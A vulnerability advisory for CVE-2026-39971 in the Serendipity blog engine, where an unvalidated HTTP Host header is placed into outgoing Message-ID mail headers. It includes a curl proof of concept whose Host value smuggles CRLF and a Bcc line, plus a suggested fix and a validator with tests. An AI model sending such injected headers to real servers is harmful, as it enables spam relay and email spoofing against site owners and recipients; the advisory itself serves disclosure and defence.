
CVE

CVE-2026-39971

Serendipity has a Host Header Injection allows SMTP header injection via unvalidated HTTP_HOST in Message-ID email header

Summary

Serendipity inserts $_SERVER['HTTP_HOST'] directly into the Message-ID SMTP header without any validation beyond CRLF stripping. An attacker who can control the Host header during an email-triggering action can inject arbitrary SMTP headers into outgoing emails, enabling spam relay, BCC injection, and email spoofing.

Details

In include/functions.inc.php:548:

$maildata['headers'][] = 'Message-ID: <' 
    . bin2hex(random_bytes(16)) 
    . '@' . $_SERVER['HTTP_HOST']  // ← unsanitized, attacker-controlled
    . '>';

The existing sanitization function only blocks \r\n and URL-encoded variants:

function serendipity_isResponseClean($d) {
    return (strpos($d, "\r") === false && strpos($d, "\n") === false 
        && stripos($d, "%0A") === false && stripos($d, "%0D") === false);
}

Critically, serendipity_isResponseClean() is not even called on HTTP_HOST before embedding it into the mail headers — making this exploitable with any character that SMTP interprets as a header delimiter.

Email is triggered by actions such as:

  • New comment notifications to blog owner
  • Comment subscription notifications to subscribers
  • Password reset emails (if configured)

PoC

## Trigger comment notification email with injected header
curl -s -X POST \
  -H "Host: attacker.com>\r\nBcc: victim@evil.com\r\nX-Injected:" \
  -d "serendipity[comment]=test&serendipity[name]=hacker&serendipity[email]=a@b.com&serendipity[entry_id]=1" \
  http://[TARGET]/comment.php

Resulting malicious Message-ID header in outgoing email:

Message-ID: <deadbeef@attacker.com>
Bcc: victim@evil.com
X-Injected: >

Impact

An attacker can control the domain portion of the Message-ID header in all outgoing emails sent by Serendipity (comment notifications, subscriptions). 

This enables:

  • Identity spoofing — emails appear to originate from attacker-controlled domain
  • Reply hijacking — some mail clients use Message-ID for threading, pointing replies toward attacker infrastructure
  • Email reputation abuse — attacker's domain embedded in legitimate mail headers

Suggested Fix

Sanitize HTTP_HOST before embedding in mail headers, and restrict to valid hostname characters only:

// parse_url() returns false/null on malformed input; the cast keeps
// preg_replace() working on a string (it then yields '' rather than an error)
$safe_host = preg_replace('/[^a-zA-Z0-9.\-]/', '',
    (string) parse_url('http://' . $_SERVER['HTTP_HOST'], PHP_URL_HOST)
);
// same header as before, but the domain part now comes from $safe_host
$maildata['headers'][] = 'Message-ID: <'
    . bin2hex(random_bytes(16))
    . '@' . $safe_host
    . '>';
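As an added example, not Serendipity's own code, covering both the Details and the Suggested Fix above: the page's CRLF-only check is reproduced beside a hypothetical allow-list validator, safe_mail_host(), and a build_message_id() helper that uses it. The inputs are constructed; the hostile one is the Host value from the PoC above. It shows that the existing check lets through a Host value that carries no CR/LF but still carries a stray '>', whereas the allow-list keeps only a well-formed RFC 1123 hostname and substitutes a fallback for anything else.

```php
<?php
// Added example (not Serendipity's own code): a strict Host validator for use
// when building the Message-ID header, contrasted with the CRLF-only check.

// The page's existing check, reproduced for comparison: it only rejects CR/LF
// and their URL-encoded forms, so '>' and other header-breaking characters pass.
function serendipity_isResponseClean($d) {
    return (strpos($d, "\r") === false && strpos($d, "\n") === false
        && stripos($d, "%0A") === false && stripos($d, "%0D") === false);
}

// Hypothetical helper: allow-list validation of a Host header value.
// Accepts an RFC 1123 hostname (an optional :port suffix is dropped),
// rejects everything else and returns $fallback instead.
function safe_mail_host(string $host, string $fallback = 'localhost'): string {
    $host = strtolower(trim($host));
    // Strip an optional port. Bracketed IPv6 literals are not hostnames and are rejected below.
    $host = preg_replace('/:\d{1,5}$/D', '', $host);
    // Labels: 1-63 chars of [a-z0-9-], not starting or ending with '-', joined by '.'
    $label = '(?!-)[a-z0-9-]{1,63}(?<!-)';
    if (strlen($host) > 253 || !preg_match('/^' . $label . '(\.' . $label . ')*$/D', $host)) {
        return $fallback;
    }
    return $host;
}

// Builds the Message-ID header from the validated host only.
function build_message_id(string $raw_host): string {
    return 'Message-ID: <' . bin2hex(random_bytes(16)) . '@' . safe_mail_host($raw_host) . '>';
}

// Constructed inputs: a benign host with a port, the PoC value, and a
// CR/LF-free variant that still contains a stray '>'.
$benign          = 'blog.example.com:8080';
$hostile         = "attacker.com>\r\nBcc: victim@evil.com\r\nX-Injected:";
$hostile_no_crlf = 'attacker.com>extra';

// The CRLF-only check rejects the raw PoC value ...
assert(serendipity_isResponseClean($hostile) === false);
// ... but passes the variant, which would still yield a malformed Message-ID.
assert(serendipity_isResponseClean($hostile_no_crlf) === true);

// The allow-list validator keeps only a well-formed hostname.
assert(safe_mail_host($benign) === 'blog.example.com');
assert(safe_mail_host($hostile) === 'localhost');
assert(safe_mail_host($hostile_no_crlf) === 'localhost');

// The assembled header contains no CR, no LF and exactly one '<...>' pair.
$hdr = build_message_id($hostile);
assert(preg_match('/^Message-ID: <[0-9a-f]{32}@localhost>$/D', $hdr) === 1);
echo $hdr, PHP_EOL;
```

Run it with php on the command line; the assert() calls fire when zend.assertions is enabled (the development php.ini default). The 'localhost' fallback is only a placeholder for the example: in a deployment the fallback should be the blog's own configured hostname (for instance, the host part of its configured base URL) rather than anything taken from the request.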

CVSS

CVSS Version | Severity | Base Score | Score Vector
3.1 | High | 7.2 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N


References

  • https://github.com/s9y/Serendipity/security/advisories/GHSA-458g-q4fh-mj6r
  • https://nvd.nist.gov/vuln/detail/CVE-2026-39971
  • https://github.com/s9y/Serendipity
  • https://github.com/s9y/Serendipity/releases/tag/2.6.0

Basic Information

Base CVSS: 7.2
EPSS Probability: 0.00064%
EPSS Percentile: 0.20224%
Introduced Version: 0
Fix Available: 2.6.0
